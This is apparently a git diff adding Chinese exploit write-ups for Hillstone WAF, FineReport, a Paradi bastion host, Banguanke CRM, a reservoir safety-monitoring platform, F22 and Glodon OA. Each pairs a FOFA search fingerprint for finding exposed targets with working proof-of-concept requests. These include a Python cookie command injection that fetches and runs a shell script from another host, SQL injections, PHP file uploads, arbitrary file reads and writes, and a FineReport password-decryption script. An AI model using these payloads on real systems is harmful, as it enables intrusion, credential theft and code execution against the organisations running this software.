+山石网科 Web 应用防火墙（WAF）是专业智能的Web 应用安全防护产品，在Web资产发现、漏洞评估、流量学习、威胁定位等方面全面应用智能分析和语义分析技术，帮助用户轻松应对应用层风险，确保网站全天候的安全运营。
+
+在WAF的验证码页面，存在命令注入漏洞，恶意攻击者可通过构造恶意请求，拼接命令执行任意代码，控制服务器。
+
+**受影响版本:**
+5.5R6-2.6.7~5.5R6-2.8.13
+
+## fofa
+
+```yaml
+icon_hash="-839455805"
+```
+
+## poc
+
+```python
+import requests,sys
+requests.packages.urllib3.disable_warnings()
+session = requests.Session()
+
+target = "https://192.168.247.196/".strip("/")
+cmd="curl\x24{IFS}192.168.247.1:9999/cccc|sh"
+url = target+"/rest/captcha"
+headers = {"Accept":"*/*","User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)","Accept-Language":"en;q=0.9"}
+sss=requests.get(url,headers=headers,verify=False)
+
+if "PNG" not  in sss.content:
+    print("target not vuln")
+    sys.exit()
+
+
+
+
+cookies = {"PHPSESSID":"aaaaaaaaaa%3b"+cmd+"%3bd"}
+try:
+    response = session.get(target+"/rest/captcha", headers=headers, cookies=cookies,verify=False,timeout=5)
+except requests.exceptions.ReadTimeout:
+    print("payload work")
+    sys.exit()
+
+print("payload send!")
+```
+
diff --git a/帆软报表-V8-get_geo_json-任意文件读取漏洞.md b/帆软报表-V8-get_geo_json-任意文件读取漏洞.md
new file mode 100644
index 0000000..649c9ea
--- /dev/null
+++ b/帆软报表-V8-get_geo_json-任意文件读取漏洞.md
@@ -0,0 +1,27 @@
+## 帆软报表 V8 get_geo_json 任意文件读取漏洞
+
+## fofa
+```
+body="isSupportForgetPwd"
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/b38dbaa3-3103-45e7-980b-7f3adf6a95ba)
+
+
+## poc
+```
+WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
+```
+
+获得账号密码后进行解密，解密脚本如下
+## 解密脚本
+```python
+cipher = 'XXXXXXXXXXX' #密文
+PASSWORD_MASK_ARRAY = [19, 78, 10, 15, 100, 213, 43, 23]
+Password = "" cipher = cipher[3:]
+for i in range(int(len(cipher) / 4)):
+c1 = int("0x" + cipher[i * 4:(i + 1) * 4], 16)
+c2 = c1 ^ PASSWORD_MASK_ARRAY[i % 8]
+Password = Password + chr(c2)
+print (Password)
+```
diff --git a/帕拉迪堡垒机sslvpnservice.php存在SQL注入漏洞 2.md b/帕拉迪堡垒机sslvpnservice.php存在SQL注入漏洞 2.md
new file mode 100644
index 0000000..99e6cb0
--- /dev/null
+++ b/帕拉迪堡垒机sslvpnservice.php存在SQL注入漏洞 2.md	
@@ -0,0 +1,42 @@
+# 帕拉迪堡垒机sslvpnservice.php存在SQL注入漏洞
+
+# 一、漏洞简介
+帕拉迪堡垒机支持移动管理和运维BYOD。移动管理和运维逐渐成为刚需，通过专用App从管理者和运维者角度进行多方位管理和操作。对服务器和网络中的各种帐号都能一键收集，对其状态一目了然，并做到最全单点登录。可编程环境通道。可进行自动化程序穿透，通过API接口，让运维自动化不再是法外之地，整个自动化过程可管理可审计，帕拉迪堡垒机sslvpnservice.php存在SQL注入漏洞
+
+# 二、影响版本
+帕拉迪堡垒机
+
+# 三、资产测绘
++ fofa `app="帕拉迪Core4A-UTM"`
++ 特征
+
+![1732591708185-7197ed3c-426d-406d-87bc-e274f1e91112.png](./img/dMM0XuD_mFjW1yLK/1732591708185-7197ed3c-426d-406d-87bc-e274f1e91112-569324.png)
+
+# 四 、漏洞复现
+```java
+POST /sslvpnservice.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML,
+like Gecko) Chrome/89.0.4389.90 Safari/537.36
+Connection: close
+Cookie: PHPSESSID=8fdj8pske96v2qdg13g36u8872; think_language=zh-cn
+Content-Type: text/xml
+Content-Length: 580
+
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<SOAP-ENV:Envelope SOAPENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAPENV="http://schemas.xmlsoap.org/soap/envelope/"
+xmlns:xsd="http://www.w3.org/2001/XMLSchema"
+xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAPENC="http://schemas.xmlsoap.org/soap/encoding/">
+<SOAP-ENV:Body>
+<getAccountDetail>
+<data>
+{"token":"4e28b56969e59a18d72d0050a47f812a","user":"superman","acctid":"-1' or
+1=if(1=1,1,2) limit 0,1 -- a","index":"1"}</data>
+</getAccountDetail>
+</SOAP-ENV:Body></SOAP-ENV:Envelope>
+```
+
+
+
+> 更新: 2024-11-27 10:04:11  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yxne8q3lvcvl18bl>
\ No newline at end of file
diff --git a/帕拉迪堡垒机sslvpnservice.php存在SQL注入漏洞.md b/帕拉迪堡垒机sslvpnservice.php存在SQL注入漏洞.md
new file mode 100644
index 0000000..56e6c48
--- /dev/null
+++ b/帕拉迪堡垒机sslvpnservice.php存在SQL注入漏洞.md
@@ -0,0 +1,57 @@
+# 帕拉迪堡垒机sslvpnservice.php存在SQL注入漏洞
+
+帕拉迪堡垒机sslvpnservice.php存在SQL注入漏洞
+
+## poc
+
+```javascript
+POST /sslvpnservice.php HTTP/1.1
+Host: xxxx
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML,
+like Gecko) Chrome/89.0.4389.90 Safari/537.36
+Connection: close
+Cookie: PHPSESSID=8fdj8pske96v2qdg13g36u8872; think_language=zh-cn
+Content-Type: text/xml
+Content-Length: 580
+
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<SOAP-ENV:Envelope SOAPENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAPENV="http://schemas.xmlsoap.org/soap/envelope/"
+xmlns:xsd="http://www.w3.org/2001/XMLSchema"
+xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAPENC="http://schemas.xmlsoap.org/soap/encoding/">
+<SOAP-ENV:Body>
+<getAccountDetail>
+<data>
+{"token":"4e28b56969e59a18d72d0050a47f812a","user":"superman","acctid":"-1' or
+1=if(1=1,1,2) limit 0,1 -- a","index":"1"}</data>
+</getAccountDetail>
+</SOAP-ENV:Body></SOAP-ENV:Envelope>
+```
+
+```javascript
+POST /sslvpnservice.php HTTP/1.1
+Host: xxxx
+Connection: close
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML,
+like Gecko) Chrome/89.0.4389.90 Safari/537.36
+Cookie: PHPSESSID=8fdj8pske96v2qdg13g36u8872; think_language=zh-cn
+Content-Type: text/xml
+Content-Length: 580
+
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<SOAP-ENV:Envelope SOAPENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAPENV="http://schemas.xmlsoap.org/soap/envelope/"
+xmlns:xsd="http://www.w3.org/2001/XMLSchema"
+xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAPENC="http://schemas.xmlsoap.org/soap/encoding/">
+<SOAP-ENV:Body>
+<getAccountDetail>
+<data>
+{"token":"4e28b56969e59a18d72d0050a47f812a","user":"superman","acctid":"-1' or
+1=if(1=1*,1,2) limit 0,1 -- a","index":"1"}</data>
+</getAccountDetail>
+</SOAP-ENV:Body></SOAP-ENV:Envelope>
+```
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/vllWjQIXB7vQR0IjUgXpww
\ No newline at end of file
diff --git a/帮管客CRMajax_upload_chat存在任意文件上传漏洞.md b/帮管客CRMajax_upload_chat存在任意文件上传漏洞.md
new file mode 100644
index 0000000..d477eea
--- /dev/null
+++ b/帮管客CRMajax_upload_chat存在任意文件上传漏洞.md
@@ -0,0 +1,48 @@
+# 帮管客CRM ajax_upload_chat存在任意文件上传漏洞
+
+# 一、漏洞简介
+帮管客CRM是一款集客户档案、销售记录、业务往来等功能于一体的客户管理系统。帮管客CRM客户管理系统，客户管理，从未如此简单，一个平台满足企业全方位的销售跟进、智能化服务管理、高效的沟通协同、图表化.帮管客CRM ajax_upload_chat、ajax_upload等接口处存在文件上传漏洞，未经授权的攻击者可利用该漏洞获取服务器权限。
+
+# 二、影响版本
++ 帮管客CRM
+
+# 三、资产测绘
++ fofa`app="帮管客-CRM"`
++ 特征
+
+![1706689730844-244c90a3-963a-47a3-ab90-419f4b5c87bc.png](./img/h4aYWkJUdTJ5y2vF/1706689730844-244c90a3-963a-47a3-ab90-419f4b5c87bc-024774.png)
+
+# 四、漏洞复现
+```plain
+POST /index.php/upload/ajax_upload_chat HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryv1WbOn5o
+
+------WebKitFormBoundaryv1WbOn5o
+Content-Disposition: form-data; name="file"; filename="1.php"
+Content-Type: image/jpeg
+
+<?php
+phpinfo();unlink(__FILE__);
+------WebKitFormBoundaryv1WbOn5o--
+```
+
+![1706690830026-a7bab378-c87a-46bc-85d4-686ab7e8fb18.png](./img/h4aYWkJUdTJ5y2vF/1706690830026-a7bab378-c87a-46bc-85d4-686ab7e8fb18-379617.png)
+
+上传文件位置
+
+```plain
+//data//uploads//uploads_chat//202401//202401311645381ARfoVrTb.php
+```
+
+![1706690872806-eb87eaac-9761-44e5-8d65-22646a6ab0f5.png](./img/h4aYWkJUdTJ5y2vF/1706690872806-eb87eaac-9761-44e5-8d65-22646a6ab0f5-162023.png)
+
+
+
+> 更新: 2024-02-29 23:55:41  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zv9kvh2812magvgl>
\ No newline at end of file
diff --git a/帮管客CRMajax_upload存在任意文件上传漏洞.md b/帮管客CRMajax_upload存在任意文件上传漏洞.md
new file mode 100644
index 0000000..10b2d0c
--- /dev/null
+++ b/帮管客CRMajax_upload存在任意文件上传漏洞.md
@@ -0,0 +1,48 @@
+# 帮管客CRM ajax_upload存在任意文件上传漏洞
+
+# 一、漏洞简介
+帮管客CRM是一款集客户档案、销售记录、业务往来等功能于一体的客户管理系统。帮管客CRM客户管理系统，客户管理，从未如此简单，一个平台满足企业全方位的销售跟进、智能化服务管理、高效的沟通协同、图表化.帮管客CRM ajax_upload_chat、ajax_upload等接口处存在文件上传漏洞，未经授权的攻击者可利用该漏洞获取服务器权限。
+
+# 二、影响版本
++ 帮管客CRM
+
+# 三、资产测绘
++ fofa`app="帮管客-CRM"`
++ 特征
+
+![1706689730844-244c90a3-963a-47a3-ab90-419f4b5c87bc.png](./img/-q9KN7Vz-WxptVyQ/1706689730844-244c90a3-963a-47a3-ab90-419f4b5c87bc-081759.png)
+
+# 四、漏洞复现
+```plain
+POST /index.php/upload/ajax_upload HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryv1WbOn5o
+
+------WebKitFormBoundaryv1WbOn5o
+Content-Disposition: form-data; name="file"; filename="1.php"
+Content-Type: image/jpeg
+
+<?php
+phpinfo();unlink(__FILE__);
+------WebKitFormBoundaryv1WbOn5o--
+```
+
+![1706690699374-5bb1431f-958f-4d90-8541-9938e4c2a1d4.png](./img/-q9KN7Vz-WxptVyQ/1706690699374-5bb1431f-958f-4d90-8541-9938e4c2a1d4-672428.png)
+
+上传文件位置
+
+```plain
+//data//uploads//202401//202401311642767GFUPHdsA.php
+```
+
+![1706690729835-bf862932-a71e-4dd3-b157-3cd0f62be938.png](./img/-q9KN7Vz-WxptVyQ/1706690729835-bf862932-a71e-4dd3-b157-3cd0f62be938-486853.png)
+
+
+
+> 更新: 2024-02-29 23:55:41  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gx3kacfb8q9w0bdb>
\ No newline at end of file
diff --git a/帮管客CRMinit信息泄露漏洞.md b/帮管客CRMinit信息泄露漏洞.md
new file mode 100644
index 0000000..e5e9c32
--- /dev/null
+++ b/帮管客CRMinit信息泄露漏洞.md
@@ -0,0 +1,41 @@
+# 帮管客CRM init 信息泄露漏洞
+
+# 一、漏洞简介
+帮管客CRM是一款集客户档案、销售记录、业务往来等功能于一体的客户管理系统。帮管客CRM客户管理系统，客户管理，从未如此简单，一个平台满足企业全方位的销售跟进、智能化服务管理、高效的沟通协同、图表化.帮管客CRM init 信息泄露漏洞
+
+# 二、影响版本
++ 帮管客CRM
+
+# 三、资产测绘
++ fofa`app="帮管客-CRM"`
++ 特征
+
+![1706689730844-244c90a3-963a-47a3-ab90-419f4b5c87bc.png](./img/qSUgLfGAWWht2e5C/1706689730844-244c90a3-963a-47a3-ab90-419f4b5c87bc-199793.png)
+
+# 四、漏洞复现
+```plain
+GET /index.php/chat/init HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+```
+
+![1707102932058-96647d60-8fd3-4db1-8d73-867b3eb902da.png](./img/qSUgLfGAWWht2e5C/1707102932058-96647d60-8fd3-4db1-8d73-867b3eb902da-984311.png)
+
+使用泄漏的账号密码登陆系统
+
+![1707103077320-0d5620ba-3942-4301-94bb-a7b11dd1faae.png](./img/qSUgLfGAWWht2e5C/1707103077320-0d5620ba-3942-4301-94bb-a7b11dd1faae-189968.png)
+
+
+
+> 更新: 2024-02-29 23:55:41  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mc3s6wuyw1qn9n0t>
\ No newline at end of file
diff --git a/帮管客CRMmessage存在SQL注入漏洞.md b/帮管客CRMmessage存在SQL注入漏洞.md
new file mode 100644
index 0000000..853cc35
--- /dev/null
+++ b/帮管客CRMmessage存在SQL注入漏洞.md
@@ -0,0 +1,41 @@
+# 帮管客CRM message存在SQL注入漏洞
+
+# 一、漏洞简介
+帮管客CRM是一款集客户档案、销售记录、业务往来等功能于一体的客户管理系统。帮管客CRM客户管理系统，客户管理，从未如此简单，一个平台满足企业全方位的销售跟进、智能化服务管理、高效的沟通协同、图表化帮管客CRM 客户管理系统/index.php/message 接口存在 sql 注入漏洞，未经身份认证的攻击者可通过此漏洞获取数据库敏感信息。
+
+# 二、影响版本
++ 帮管客CRM
+
+# 三、资产测绘
++ fofa`app="帮管客-CRM"`
++ 特征
+
+![1706689730844-244c90a3-963a-47a3-ab90-419f4b5c87bc.png](./img/haFr-bDMJulNGjGU/1706689730844-244c90a3-963a-47a3-ab90-419f4b5c87bc-120634.png)
+
+# 四、漏洞复现
+```plain
+GET /index.php/message?page=1&pai=1%20and%20extractvalue(0x7e,concat(0x7e,(select+md5(1)),0x7e))%23&xu=desc HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Accept-Encoding: gzip, deflate
+Connection: close
+```
+
+![1706689959197-d1cbe09b-080c-476c-802c-d6bb9a6e2fab.png](./img/haFr-bDMJulNGjGU/1706689959197-d1cbe09b-080c-476c-802c-d6bb9a6e2fab-064551.png)
+
+```plain
+c4ca4238a0b923820dcc509a6f75849
+```
+
+sqlmap
+
+```plain
+/index.php/message?page=1&pai=1
+```
+
+![1706690225476-e322a53f-2bd6-47ce-a68c-6e96bde9ba0b.png](./img/haFr-bDMJulNGjGU/1706690225476-e322a53f-2bd6-47ce-a68c-6e96bde9ba0b-839621.png)
+
+
+
+> 更新: 2024-02-29 23:55:41  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mqhzq6w8dmpgikxd>
\ No newline at end of file
diff --git a/平升电子水库安全监管平台GetRecordsByTableNameAndColumns存在SQL注入漏洞.md b/平升电子水库安全监管平台GetRecordsByTableNameAndColumns存在SQL注入漏洞.md
new file mode 100644
index 0000000..38ea6d8
--- /dev/null
+++ b/平升电子水库安全监管平台GetRecordsByTableNameAndColumns存在SQL注入漏洞.md
@@ -0,0 +1,57 @@
+# 平升电子水库安全监管平台GetRecordsByTableNameAndColumns存在SQL注入漏洞
+
+# 一、漏洞简介
+唐山平升电子技术开发有限公司于1999年成立，位于唐山市国家高新技术开发区，是河北省高科技企业，是国内最早生产GPRS数据传输模块的企业之一，专注水行业远程测控设备和系统软件的专业制造商。公司自成立以来，始终致力于供水、水资源远程测控新技术、新产品的开发生产，其中GPRS数据传输模块应用到青藏铁路、大庆油田、曹妃甸工业区等许多国家重点工程和大型企业；水源井远程测控终端通过了国家权威机构的检验、获得国家专利、批量应用到浙江、山西、山东、辽宁、江苏、河南、河北、内蒙、陕西、北京、天津、唐山等许多地区的水务部门，成为行业中的名牌产品。平升电子水库安全监管平台GetRecordsByTableNameAndColumns存在SQL注入漏洞，攻击者可通过该漏洞获取数据库权限 。
+
+# 二、影响版本
++ 平升电子水库安全监管平台
+
+# 三、资产测绘
++ fofa`body="js/PSExtend.js"`
++ 特征
+
+![1710688105375-14ec86fd-745f-4b3c-a67b-f02aa940459c.png](./img/oCDAx2tRVXTcV9Ym/1710688105375-14ec86fd-745f-4b3c-a67b-f02aa940459c-537710.png)
+
+# 四、漏洞复现
+首先获取Guid
+
+```plain
+POST /Webservices/UserAdminService.asmx/Login HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Accept: application/json, text/plain, */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 35
+Connection: close
+
+LoginName=Data86&LoginPwd=Data86%40
+```
+
+![1716451555256-4b68752c-8c40-4044-99d5-62f6b42e3c44.png](./img/oCDAx2tRVXTcV9Ym/1716451555256-4b68752c-8c40-4044-99d5-62f6b42e3c44-488482.png)
+
+替换获取的Guid发送数据包
+
+```plain
+POST /WebServices/DataBaseService.asmx/GetRecordsByTableNameAndColumns HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Content-Length: 105
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+
+loginIdentifer=07deec48-6ee8-4127-9b27-fda9ae2036f9&requestInfos=&tableName=syscolumns&columns=top+1+substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)
+```
+
+![1716451619577-c49d1ee3-f6c3-4e57-9e8a-2e025ad3621b.png](./img/oCDAx2tRVXTcV9Ym/1716451619577-c49d1ee3-f6c3-4e57-9e8a-2e025ad3621b-115713.png)
+
+
+
+
+
+> 更新: 2024-05-26 11:28:46  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pq90gr1d4fdx1r82>
\ No newline at end of file
diff --git a/广州锦铭泰软件科技有限公司F22服装管理软件系统index_login.asp存在信息泄漏漏洞.md b/广州锦铭泰软件科技有限公司F22服装管理软件系统index_login.asp存在信息泄漏漏洞.md
new file mode 100644
index 0000000..e0554d7
--- /dev/null
+++ b/广州锦铭泰软件科技有限公司F22服装管理软件系统index_login.asp存在信息泄漏漏洞.md
@@ -0,0 +1,30 @@
+# 广州锦铭泰软件科技有限公司F22服装管理软件系统index_login.asp存在信息泄漏漏洞
+
+# 一、漏洞简介
+广州锦铭泰软件科技有限公司，是一家专业为品牌服饰鞋包企业提供信息化解决方案的高科技企业，该公司开发的F22服装管理软件系统存在信息泄漏漏洞，攻击者最终可利用该漏洞获取数据库账号密码等连接信息。
+
+# 二、影响版本
++ F22服装管理软件系统
+
+# 三、资产测绘
++ hunter
++ 特征
+
+![1701097856863-836b585b-5ad5-4a30-9d15-de84e9bb5567.png](./img/MHECYITamkoAwlWR/1701097856863-836b585b-5ad5-4a30-9d15-de84e9bb5567-922677.png)
+
+# 四、漏洞复现
+```java
+GET /pos/index_login.asp HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
+Accept: */*
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+```
+
+![1702014624209-0f6319f6-e292-4c9c-a571-8600d6f09242.png](./img/MHECYITamkoAwlWR/1702014624209-0f6319f6-e292-4c9c-a571-8600d6f09242-352619.png)
+
+
+
+> 更新: 2024-02-29 23:55:44  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ols3csnzkgnc69fn>
\ No newline at end of file
diff --git a/广州锦铭泰软件科技有限公司F22服装管理软件系统openfile.aspx前台任意文件下载.md b/广州锦铭泰软件科技有限公司F22服装管理软件系统openfile.aspx前台任意文件下载.md
new file mode 100644
index 0000000..03a3891
--- /dev/null
+++ b/广州锦铭泰软件科技有限公司F22服装管理软件系统openfile.aspx前台任意文件下载.md
@@ -0,0 +1,32 @@
+# 广州锦铭泰软件科技有限公司F22服装管理软件系统openfile.aspx前台任意文件下载
+
+# 一、漏洞简介
+广州锦铭泰软件科技有限公司，是一家专业为品牌服饰鞋包企业提供信息化解决方案的高科技企业，该公司开发的F22服装管理软件系统存在接口未授权访问，通过未授权的口/oa/isprit/module/openfile.aspx存在任意文件下载漏洞。攻击者最终可利用该漏洞获取敏感信息。
+
+# 二、影响版本
++ F22服装管理软件系统
+
+# 三、资产测绘
++ hunter
++ 特征
+
+![1701097856863-836b585b-5ad5-4a30-9d15-de84e9bb5567.png](./img/F6ehaHwmiT2nLKU9/1701097856863-836b585b-5ad5-4a30-9d15-de84e9bb5567-711181.png)
+
+# 四、漏洞复现
+```plain
+GET /oa/isprit/module/openfile.aspx?Url=..\..\..\Web.config HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+```
+
+![1701097898821-70329903-417e-40d4-b245-8c141fdfe265.png](./img/F6ehaHwmiT2nLKU9/1701097898821-70329903-417e-40d4-b245-8c141fdfe265-689811.png)
+
+
+
+> 更新: 2024-02-29 23:55:44  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ghu980augeuitr7e>
\ No newline at end of file
diff --git a/广联达OA系统接口do.asmx存在任意文件写入漏洞.md b/广联达OA系统接口do.asmx存在任意文件写入漏洞.md
new file mode 100644
index 0000000..6f94825
--- /dev/null
+++ b/广联达OA系统接口do.asmx存在任意文件写入漏洞.md
@@ -0,0 +1,62 @@
+# 广联达OA系统接口do.asmx存在任意文件写入漏洞
+
+广联达OA系统接口do.asmx存在任意文件写入漏洞，允许攻击者上传恶意文件到服务器，可能导致远程代码执行、网站篡改或其他形式的攻击，严重威胁系统和数据安全。
+
+## fofa
+
+```javascript
+body="Services/Identification/login.ashx" || header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"
+```
+
+## poc
+
+```javascript
+POST /m/mobileAction.ashx/do.asmx?controller=Microsoft.VisualBasic.FileIO.FileSystem%2c%20Microsoft.VisualBasic%2c%20Version%3d8.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db03f5f7f11d50a3a&action=WriteAllBytes HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: application/json
+Connection: close
+
+["\"D:\\\\Program Files (x86)\\\\Glodon\\\\GTP\\\\data\\\\gtp-default\\\\FileStorage\\\\UserFiles\\\\1.asp\"","[60, 37, 32, 82, 101, 115, 112, 111, 110, 115, 101, 46, 87, 114, 105, 116, 101, 40, 34, 72, 101, 108, 108, 111, 44, 32, 87, 111, 114, 108, 100, 34, 41, 32, 37, 62]","false"]
+```
+
+请求体中的上传路径并不通用，需要根据实际环境选择，文件的内容需要转换为ASCII码
+
+```python
+def ascii_to_char(ascii_codes):  
+    """将ASCII码列表转换为字符"""  
+    return ''.join(chr(code) for code in ascii_codes)  
+  
+def char_to_ascii(char):  
+    """将字符串转换为ASCII码列表"""  
+    return [ord(c) for c in char]  
+  
+def main():  
+    print("0 字符转ASCII码")  
+    print("1 ASCII码转字符")  
+    choice = input("请选择转换类型（0/1）: ")  
+  
+    if choice == '0':  
+        # 字符转ASCII码  
+        chars = input("请输入要转换的字符: ")  
+        ascii_codes = char_to_ascii(chars)  
+        print("字符转ASCII码:", ascii_codes)  
+    elif choice == '1':  
+        # ASCII码转字符  
+        ascii_codes_str = input("请输入以逗号分隔的ASCII码（例如：65,66,67）: ")  
+        ascii_codes = [int(code.strip()) for code in ascii_codes_str.split(',')]  
+        converted_chars = ascii_to_char(ascii_codes)  
+        print("ASCII码转字符:", converted_chars)  
+    else:  
+        print("无效的输入，请输入0或1。")  
+  
+if __name__ == "__main__":  
+    main()
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409141650271.png)
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409141650535.png)
\ No newline at end of file
diff --git a/广联达OA系统接口do.asmx存在任意文件读取漏洞.md b/广联达OA系统接口do.asmx存在任意文件读取漏洞.md
new file mode 100644
index 0000000..3586436
--- /dev/null
+++ b/广联达OA系统接口do.asmx存在任意文件读取漏洞.md
@@ -0,0 +1,61 @@
+# 广联达OA系统接口do.asmx存在任意文件读取漏洞
+
+广联达OA系统接口` /m/mobileAction.ashx/do.asmx`存在任意文件读取漏洞，可能导致敏感信息泄露、数据盗窃及其他安全风险，从而对系统和用户造成严重危害。
+
+## fofa
+
+```javascript
+body="Services/Identification/login.ashx" || header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"
+```
+
+## poc
+
+```javascript
+POST /m/mobileAction.ashx/do.asmx?controller=Microsoft.VisualBasic.FileIO.FileSystem%2c%20Microsoft.VisualBasic%2c%20Version%3d8.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db03f5f7f11d50a3a&action=ReadAllBytes HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: application/json
+Connection: close
+
+["\"C:\\\\Windows\\\\win.ini\""]
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409141646757.png)
+
+### 解密脚本
+
+```python
+def ascii_to_char(ascii_codes):  
+    """将ASCII码列表转换为字符"""  
+    return ''.join(chr(code) for code in ascii_codes)  
+  
+def char_to_ascii(char):  
+    """将字符串转换为ASCII码列表"""  
+    return [ord(c) for c in char]  
+  
+def main():  
+    print("0 字符转ASCII码")  
+    print("1 ASCII码转字符")  
+    choice = input("请选择转换类型（0/1）: ")  
+  
+    if choice == '0':  
+        # 字符转ASCII码  
+        chars = input("请输入要转换的字符: ")  
+        ascii_codes = char_to_ascii(chars)  
+        print("字符转ASCII码:", ascii_codes)  
+    elif choice == '1':  
+        # ASCII码转字符  
+        ascii_codes_str = input("请输入以逗号分隔的ASCII码（例如：65,66,67）: ")  
+        ascii_codes = [int(code.strip()) for code in ascii_codes_str.split(',')]  
+        converted_chars = ascii_to_char(ascii_codes)  
+        print("ASCII码转字符:", converted_chars)  
+    else:  
+        print("无效的输入，请输入0或1。")  
+  
+if __name__ == "__main__":  
+    main()
+```
+
